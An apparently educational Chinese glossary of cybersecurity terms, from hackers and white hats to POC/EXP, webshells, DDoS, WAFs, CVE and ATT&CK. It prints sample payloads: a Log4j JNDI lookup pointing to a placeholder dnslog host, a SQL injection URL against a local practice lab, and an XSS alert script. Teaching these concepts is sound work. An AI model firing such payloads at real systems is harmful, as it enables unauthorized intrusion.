网络安全术语大全
网络安全术语大全
黑客:
是英文单词hacker的音译。 听起来非常高大上的一个词语,我们经常在各种电影里面看到,这些人在黑底绿字的窗口敲几行代码,就破解了系统,打开了重重防守的大门,或者获取到了想要的信息,甚至可以查看任何一个摄像头画面,这个当然有艺术夸张的成分。 黑客指的是对计算机技术非常擅长的人,没有技术的人不配称为黑客。我们时不时会看到一些新闻说什么初中辍学,自学计算机,入侵系统获利,终于吃上牢饭这种新闻,至少是有些天赋的。 但是这个词语在性质上有贬义色彩,因为黑客利用他们的技术去窃取数据、破坏计算机系统,一般都是经济利益或者个人目的驱动。 黑客可能是单独行动的,也可以有组织,比如全球最知名的黑客组织Anonymous。 在中国越来越多的黑客已经被安全公司纳入麾下,把技术用在正道上,现在叫网络安全工程师或者网络安全架构师。
黑客故事系列 https://wiki.bafangwy.com/doc/423/
脚本小子:
刚刚入门安全行业,学习了一些技术,只会只用现成的工具或者从网上复制代码,尝试对别人的网站进行攻击。带有贬义。 技术牛逼才够格被称为黑客,否则只能算脚本小子。
白帽子:
也叫作白帽黑客或者道德黑客。 从技术上来说和黑客是没有区别的,但是他们使用技术的目的不一样。 与黑客从事攻击和破坏不同,白帽子的目的是发现企业的漏洞并且上报给企业,帮助其解决风险问题。 如果是在企业内部,通过合法渠道,模拟黑客的方式对系统安全问题进行测试,这个岗位就叫做渗透测试工程师。 早年最出名的白帽子平台叫做乌云,2016年7月已经被关停。 现在比较常用的是奇安信补天、漏洞盒子、CNVD、CNNVD(也叫公益SRC)。
红帽黑客:
也叫做红客。 有正义感、爱国的黑客。利用技术维护国家网络安全,并且对外来的攻击进行反击。红:是中国红旗的红。 99年,南斯拉夫大使馆被美国为首的北约部队轰炸。美国驻华大使馆被红客攻陷。 2001年,飞行员王伟被美国飞机撞击。白宫网站被黑客插上红旗。 注意:红客团体早就消失,现在自称红客的组织全都是挂羊头卖狗肉。
漏洞:
vulnerability 漏洞指的是硬件、软件协议等等存在的安全缺陷,会导致攻击者可以攻击或者破坏系统。 (跟bug不同,bug是功能缺陷) 比较知名的漏洞:永恒之蓝、log4j2。
POC:
Proof of Concept 能证明漏洞存在的代码。 比如说,要证明log4j漏洞的存在,必需要启动一个LDAP服务,一个HTTP服务,准备一个恶意代码,然后把LDAP服务器的地址通过日志去记录: ${jndi:ldap://xxxxxx.dnslog.cn/test} 只要dnslog平台出现解析记录,或者弹出了计算器,就可以证明漏洞存在。
EXP:
Exploit的缩写,是利用的意思。 exp一般是一段代码。执行了这一段利用代码之后,就能够达到攻击的目的,比如写入一个一句话木马,或者提升为root权限。 在github上,有人收集了很多漏洞的POC和EXP,可以直接利用。 也有人做了exp的数据库,可以针对软件版本进行搜索,找到exp以后直接利用,msf就是这样一个漏洞利用框架。 很多时候POC和EXP区分不是特别明显,也就是说利用成功了,就代表漏洞存在。 比如log4j的exp,可以直接执行命令。 exploit-db.com
payload:
攻击载荷,是用来对系统攻击输入的内容。 比如SQL注入的payload:http://localhost/sqli-labs/Less-3/?id=-1') union select 1,1,database() --+XSS的payload:<script>alert(1)</script>log4j的payload${jndi:ldap://xxxxxx.dnslog.cn/test}payload和exp、poc有时候区分不明显。都是代表漏洞的利用方法。一般来说,exp是包含了需要发送的payload的代码。
0day漏洞:
使用量非常大的通用产品漏洞已经被发现了(还没有公开),官方还没有发布补丁或者修复方法的漏洞。 2021年11月24日,阿里云安全团队陈兆军向Apache报告log4j RCE漏洞。12月6日,Apache发布2.15.0版本。 11月24日到12月6日这段时间,因为官方没有发布补丁,除了一些黑客,所有的用户都不知道存在这么一个漏洞,危害非常大,叫做0day漏洞。 有的同学天天说想要挖0day,这个还是需要比较多的技术积累的。 有的黑客在发现0day漏洞以后会拿到黑市上售卖,一个0day漏洞的价格可能卖到几十万美元。 漏洞的POC和EXP已经被公开了,但是很多人还来不及修复,这个叫做1day漏洞。(不一定是1天内)
1day 漏洞:
比如2021年12月9日晚上,log4j漏洞的漏洞利用细节被公开,虽然官方发了补丁,但是绝大部分的公司还不知道这个漏洞,还没有修复。所以造成了非常大的影响。 很多人去SRC平台提交漏洞,赚了很多赏金,中午到下午,各大SRC平台都不再接受log4j漏洞的提交。 对于1day漏洞,黑客往往能迅速发开出各类自动化利用工具,在全网扫描抢占肉鸡资源。
Nday漏洞:
指已经发布官方补丁的漏洞,并且时间已经过去很久的漏洞。但是,很多操作系统依然没有修复,所以依旧可以利用。 比如永恒之蓝、fastjson、Shiro、脏牛漏洞,还有各种开源CMS的漏洞。 只要你被别人发现了还在用这个版本的程序或者操作系统,并且没有打补丁,就可以利用。 Log4j就是一个Nday,在未来几年之内都可以利用。
漏扫:
即漏洞扫描。 当我们知道了各种漏洞的特征和验证方式,就可以把这些规则存储到数据库,并且利用工具对目标系统做自动化的扫描,这个动作就叫做漏洞扫描。 常用的漏洞扫描工具有AppScan、AWVS、Nessus和国内各大安全厂商的商业漏扫工具。
补丁:
它是对漏洞的修复程序。如果某个程序发现了漏洞,如果要重新安装最新的版本,这就太费时了,实际上只要把涉及到漏洞的代码文件覆盖就可以了。 比如大家每天在用的Windows系统,因为会不断发现新的漏洞,所以经常提示你更新,就是为了安装补丁程序。
渗透:
penetration 渗透一般指的是黑客入侵了网站或者计算机系统,获取到控制计算机权限的过程,这个是一个恶意、非法的行为。
渗透测试:
与之相对的,渗透测试就是经过授权、合法的行为。 它是用黑客入侵的方式对系统进行安全测试,目的是找出和修复安全漏洞,在这个过程中不会影响系统的正常运行,也不会破坏数据。
木马:
木马这个词语是从古希腊的神话传说里面来的。在攻打特洛伊城的时候,希腊人把一群战士藏在一个木马里面,被特洛伊人拉进城墙。战士跳出来杀死守军,打开城门,导致特洛伊城被攻破。 计算机的木马,指的是隐藏在计算机中的恶意程序,不容易被发现,通过木马可以对系统进行控制。可以分成受控端和控制端。
病毒:
Computer Virus 也是恶意代码或程序,病毒是不需要控制端的,可以独立存在,并且可以自动执行。跟生物学上的病毒一样,计算机病毒具有自我复制性。 比如最知名的:熊猫烧香病毒(2006)、WannaCry勒索病毒(2017)、震网病毒。 不过由于各种安全技术越来越先进,针对个人用户的病毒已经很少爆发。 从操作系统的角度来说,Windows风险最高,MacOS次之,Linux系统最安全。
僵尸网络:
英文名称为Botnet,指黑客采用一种或多种传播手段,将大量主机感染僵尸程序病毒,被感染的主机通过控制协议接收黑客的指令,从而在黑客和被感染主机之间所形成的可一对多控制的网络。
杀软:
杀毒软件就是根据木马病毒的特征码进行隔离和查杀的安全软件。 早期国内知名的瑞星、江民、金山,国外的诺顿、卡巴斯基、McAfee。在360这个搅局者的带头之下,不得已走上了免费之路。 最近几年已经很少听说有什么大规模爆发的病毒了,实际上是因为杀毒软件越来越高级了,推出了启发式查杀和云查杀的功能。
免杀:
与查杀对应的,如果黑客想要控制计算机,就需要想方设法绕过杀毒软件的检测,把木马病毒上传到目标计算机执行。一般可以通过加壳、编码混淆等等手段。 https://www.virustotal.com/ 当然,攻击、防御、绕过永远是不断升级了。 杀毒软件厂商会一直盯着恶意软件,你怎么攻,我就怎么防。 恶意软件也会盯着杀毒软件,你没有怎么防,我就怎么攻。 没有永远生效的攻击和防御方法。
肉鸡:
已经被黑客获得控制权限的机器,可能是个人电脑也可能是企业或者政府单位的服务器,通常情况下因为使用者并不知道已经被入侵,所以黑客可以长期获得权限和控制。
抓鸡:
利用出现概率非常高漏洞(比如log4j、永恒之蓝),使用自动化方式获取肉鸡的行为。
跳板:
黑客为了防止被追溯和识别身份,一般都不会用自己的电脑发起攻击,而是利用获取的肉鸡来攻击其他目标,这个肉鸡就充当一个跳板的角色。 注意它跟运维的跳板机含义不一样。
C&C服务器:
Control & Command
DDoS:
Distributed Denial of Service 它是一种特殊的攻击方式。打个比方,淘宝双十一的时候本来客流已经非常大了,下单和付款都变得很慢。 一个恶意攻击者,找不到淘宝的漏洞,但是它能不能利用自己手上的肉鸡对淘宝发起大量请求,导致其他用户无法正常访问呢?这个就是分布式拒绝服务攻击。 甚至有人把攻击作为服务出售,只要给钱,谁都可以攻击。 http://webstresser.org/ ——这个网站已经被关闭。 一般可以用防护软件、黑名单、流量清洗等等方式来防御。
后门:
黑客为了对主机进行长期的控制,在机器上种植的一段程序或留下的一个“入口”,比如我只要访问这个文件或者地址,就可以控制这台计算机。 后门可以是各种程序代码文件,比如php、jsp,也可以是可执行程序,比如exe、elf等等。 我们前面讲的木马,就经常用来充当后门。
中间人攻击:
银行系统的中间人案例: 因为没有你的账号密码,攻击者无法直接登录你的账户操作你的资金。 但是中间人却可以运行一台服务器,伪装成银行的网站,在你发起资金操作的时候,获得你的账号密码,然后篡改数据,比如把转入账户改成黑客自己的,把金额改大,然后把请求数据发给真正的银行服务器,这个就叫中间人攻击。 中间人攻击的主要方式包括:DNS欺骗、ARP欺骗、代理服务器等等。
网络钓鱼:
钓鱼网站指的是冒充的网站,用来窃取用户的账号密码。 比如骗子有可能会做一个假的淘宝登录页面,假的QQ空间登录页面,假的中国银行的登录页面,假的iCloud登录页面。 一旦用户没有留意,就会在这里面输入账号密码,账号密码就会被黑客获得。 现在很多的浏览器都可以真实域名进行强调显示,和对钓鱼网站进行识别。 比如骗子有可能会做一个假的淘宝登录页面,假的QQ空间登录页面,假的中国银行的登录页面,假的iCloud登录页面。
Webshell:
shell是一种命令执行工具,可以对计算机进行控制。 webshell就是asp、php、jsp之外的web代码文件,通过这些代码文件可以执行任意的命令,对计算机做任意的操作。 Webshell可以分为小马、一句话木马、大马。 小马:只有文件上传功能的代码。 一句话木马:只有一行代码,可以执行命令。 http://localhost/upload/uploads/shell.php 大马:体积大 http://localhost/dama.php 菜刀、蚁剑、哥斯拉、冰蝎这些就叫做shell管理工具。
Getshell:
Getshell指的就是获得命令执行环境的操作。 比如可以通过Redis的持久化功能、MySQL的写文件功能,MySQL的日志记录功能、上传功能、数据备份功能、编辑器。
提权:
权限提升 Privilege Escalation 一个操作系统是用很多的用户的,不同的用户权限不一样。 举个例子:Linux操作系统最高权限用户是root,除此之外还有很多普通用户。 比如安装mysql有一个mysql用户,部署网站有一个www用户。 一般情况下,我们通过用户获得shell,都是普通用户权限,把自己提升为管理员权限的操作就叫做提权。
拿站:
指得到一个网站的最高权限,即得到后台的管理员用户名和密码。
拖库:
拖库指的是网站被入侵以后,黑客把全部的数据都导出,窃取到了数据文件。 相关概念:裤子、社工库。
撞库:
因为很多人有在不同的网站注册相同的用户名和使用相同密码的习惯,所以当黑客拿到一个网站泄露的用户名密码之后,批量去其他网站尝试登录,这个就叫撞库。
旁站入侵:
有的公司可能会在一台服务器部署多个网站,或者有站长购买了共享的服务器,这些在同一台服务器的其他网站就叫旁站。 在这种情况下,一个网站被入侵,就会导致同服务器的其他网站也被入侵,就叫做旁站攻击或者旁站入侵。
横向移动:
攻击者入侵一台服务器成功以后,基于内部网络,继续入侵同网段的其他机器,获得控制权限,就叫做横向移动(横向渗透)。
代理Proxy:
我们一般说的网络代理,是帮我们发起网络请求的一台服务器。 最常见的场景是什么样的?我们访问国外的网站太慢了,或者打不开,但是另一个地区的服务器可以正常访问,我们又可以连接这个地区的网站,所以就让它作为代理,帮我们发起请求,获得响应以后再把数据给我们。 操作系统、浏览器、手机、各种软件,比如QQ、微信、钉钉、企业微信都可以设置代理。 除了突破限制,提升访问速度之外,还可以访问一些内部资源,比如大学的FTP服务器,隐藏真实IP等等。 VPN(Virtual Private Network)有代理的功能。
蜜罐:
Honeypot 因为攻击者会对我们外网的系统进行扫描和暴破,安装安全产品,被动防御。 如果我们想浪费攻击者的时间,或者找到攻击者的来源,并且进行反制,就需要做很多假的服务诱惑攻击者进行攻击,比如假的FTP、SSH、Telnet、Zabbix监控系统、Nginx蜜罐、MySQL蜜罐、Redis蜜罐、HTTP代理蜜罐、ElasticSearch蜜罐等等。 比如:微步 https://hfish.io/ 因为攻击者会对我们外网的系统进行扫描和暴破,安装安全产品,被动防御。
沙箱:
Sandbox(沙盒) 如果我们下载了一些软件,不确定是否安全, 可以在一个安全的虚拟机执行环境中运行它。 沙箱是一种按照安全策略限制程序行为的执行环境,就算有恶意代码,也只能影响沙箱环境而不会影响到操作系统。 比如:360 https://s.threatbook.cn/。
靶场:
如果我们要理解漏洞的原理,提升渗透的能力,就必须要有一个有漏洞的环境给我们攻击。直接去攻击别人的网站是不可取的,因为不一定有漏洞,而且是违法的。 所以,我们需要模拟一个这样的环境出来,攻击它是没有风险的,这样的模拟出来的有漏洞的环境就叫做靶场。 常见的靶场: 综合靶场:DVWA、pikachu、bwapp 专用靶场:sqli-labs、upload-labs、xss-labs 漏洞复现靶场:比如CVE 44228 上面的这些漏洞都是以网站的形式体现的,都可以用Docker运行(独立的虚拟环境)。 CTF靶场:专门用来练习CTF题目,每个人都有一个独立的环境。 操作系统靶场:比如vulnhub靶场,它需要把镜像下载到虚拟机软件中运行。 靶场现在也是一个非常大的市场,很多的企业、高校都需要这样的练习平台。
堡垒机:
假设你们公司的机房有成千上万的服务器、网络设备、应用服务,怎么访问这些资源呢?是不是直接连接,然后输入用户名密码呢? 这个风险非常大,因为密码很容易泄露,而且不知道谁在什么时候做了什么。 所以,我们需要一个统一的访问入口,只有先登录这个系统,然后才能在这个系统里面连接到其他服务器进行运维操作。 在早期的时候,这个平台也叫做跳板机,但是功能比较单一,后来增加了审批、审计、访问控制、事件记录等等功能以后,就演变成了堡垒机,也叫运维审计系统。 阿里云: https://www.aliyun.com/product/bastionhost。
WAF:
即 Web Application Firewall,即 Web 应用防火墙。 它的主要作用是对HTTP/HTTPS的流量内容进行分析,拦截恶意攻击行为。 一些基本的攻击:比如SQL注入、XSS、本地文件包含、远程代码执行、命令注入、目录扫描、密码暴破都可以直接拦截。 waf:硬件、软件、云 例如:https://www.aliyun.com/product/waf WAF应该是最基本的也是最常见的安全产品,作为渗透测试方,很多时候我们关注的是怎么绕过WAF。
APT攻击:
Advanced Persistent Threat,即高级可持续威胁攻击,指某组织在网络上对特定对象展开的持续有效的攻击活动。 有几个特点: 1、以组织开展行动 2、会针对国家、政府、基础设施等进行攻击 3、技术非常高级,手段很隐蔽。
护网:
国家组织牵头组织事业单位,国企单位,大型企业等开展攻防两方的网络安全演习。 一般一年可能有一两次,每次2个星期到一个月左右。 红队:通常指攻防演习中的攻击队伍。 蓝队:通常指攻防演习中的防守队伍。 因为周期比较短,工资是按天结算的,参考价格:800-3000一天。
CTF:
Capture The Flag夺旗赛 是一种黑客知识竞赛,有线上的题目或者线下的形式,解出题目,获得flag,就可以得分。也有攻防的形式。
CVE:
全称 Common Vulnerabilities and Exposures,通用漏洞披露 是由Mitre 公司维护的一个漏洞库,每个漏洞会有一个唯一编号。 国际通用,被广泛接受。 有的时候我们用漏洞扫描工具,扫出来的漏洞,就会直接用CVE的漏洞编号。
CNVD:
国家信息安全漏洞共享平台,由国家计算机应急响应中心 CNCERT维护,主要负责统一收集、管理国内的漏洞信息,其发布的漏洞编号前缀也为 CNVD。 https://www.cnvd.org.cn/。
应急响应:
你们公司怎么应被攻击、被加密勒索、被删库跑路等等安全紧急事件?仅仅靠事后的分析和补救措施肯定是不够的。 所以要包括事前的制度,演练和事后处理这些,这一些的制度措施就叫做应急响应。
IOC:
全称为:Indicator of Compromise,中文翻译为:入侵指标,它是描述威胁情报的时涉及一些指标,如攻击者用于C2回连的的IP地址、URL、攻击者使用的恶意软件在受害机中的存放路径与名称、对受害机注册表修改的路径等。
SRC:
Security Response Center企业的应急响应中心。 以前我们发现了企业的漏洞,是只能去乌云这种平台提交的,但是很多的企业直接建立了自己的应急响应中心,用来对外部接收白帽子发现的漏洞。 一般都会有实物、积分或者现金的奖励。 http://0xsafe.org/ 所以白帽子挖SRC有三个好处: 1、经济收入 2、简历的素材,对于找工作有帮助 招聘要求: https://www.zhipin.com/job_detail/09218b6c611a91bd0HB-29S1GVY~.html 3、还有就是名声,荣誉感。
公益SRC:
如果有些网站没有建立SRC中心,你发现了漏洞,去哪里提交呢? 可以去补天或者漏洞盒子提交,因为厂商不一定回复,回复了也不一定有奖励,这个就叫公益SRC。 https://www.vulbox.com/ 注意:不同的公司对于这种未授权的渗透测试的态度是不一样的。
EDUSRC:
EDUSRC是针对教育行业(如高校)的网站系统的漏洞挖掘与上报,提交这类漏洞通常可获得积分奖励和漏洞证书。 EDUSRC平台:https://src.sjtu.edu.cn。
众测:
众测是一种将软件测试任务外包给一组自由的真实测试人员的方式,这些测试人员可在真实世界的用户条件下利用大众碎片化的时间进行软件测试,通过这种方法来确保软件质量,可使公司收集真正的见解和反馈,并快速,廉价地发现缺陷。
网络空间测绘:
如果我们要在网络上查找资源,大家能想到的是用什么方式?肯定是百度、谷歌这样的搜索引擎。但是这些搜索引擎只能收录网页,并不能收录网络空间的应用和设备。比如你要搜一个Tomcat服务器,搜一个MySQL服务器,搜一个网络摄像头,搜一个路由器,等等。 网络空间测绘做的就是把网络空间中所有的资源检索收集起来,一般是通过扫描或者枚举的方式收录。 提供对网络空间资源搜索的搜索引擎,就叫做网络空间搜索引擎。 代表 www.shodan.io www.fofa.info www.zoomeye.org。
ATT&CK:
ATT&CK模型 Adversarial Tactics, Techniques, and Common Knowledge 对抗战术、技术和通用知识(攻击者技战术的知识库) 是MITRE公司2013年提出的一个模型。和CVE漏洞库一样,也是MITRE维护的。 MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) is a curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s attack lifecycle and the platforms they are known to target. 如果我们想找出公司系统中所有潜在的威胁,必需要对所有的攻击类型有一个全面的了解,这样才能做系统的修复和防御。 除了评估和检测风险之外,ATT&ACK模型也可以用来收集威胁情报,模拟APT攻击。
逆向:
程序的发布,是把源代码编译并且打包、加密的过程。 比如现在有一个勒索病毒把电脑文件加密了,我想要解密,又不想付钱,必须要知道它到底是怎么加密的。 如果我们要分析恶意软件的运行原理,就必须要从程序出发,反编译除源码,对运行流程进行分析,而且可以对程序进行改造。网上各种各样的破解版的软件就是这么来的,外挂肯定也是基于对程序的逆向分析实现的(破解和外挂都是违法的)。
DevOps:
DevOps叫做开发测试运维一体化。 也就是说,程序员的代码一提交,程序就会自动编译打包,并且自动把测试版本部署上线,测试人员可以用自动化或者人工的方式进行测试。 发版也更频繁,开发测试运维的关系更加紧密,效率更高,实际上线后暴露的问题更少。
CICD:
DevOps是一种理念,需要CICD的技术来实现。 CICD包括: 持续集成(Continuous Integration)、持续交付(Continuous Delivery) 、持续部署(Continuous Deployment) 集成的意思就是各个功能模块开发或者修改完毕,代码合并到一起。 交付的意思就是经过单元测试、集成测试以后,达到上线标准。 部署的意思就是程序在测试环境或者生产环境发布运行起来。 Git代码管理、Jenkins版本管理、代码扫描、自动化测试都是CICD会用到的技术。
DevSecOps:
它是在DevOps的概念上发展过来的。 全称为 Development Security Operations,可翻译为安全开发与运维。 它强调在 DevOps 计划刚启动时就要邀请安全团队来确保信息的安全性,制定自动安全防护计划,并贯穿始终,实现持续IT 防护。
等保:
网络安全等级保护,国家的一项基本制度,要求相关行业的单位和公司的信息系统必须进行定级,然后在公安机关备案。然后建设整改,然后由测评机构评级,并且持续维护和监督。对于一些重要的系统,被破坏后带来比较大的影响的,如果不做等保,就是违法行为。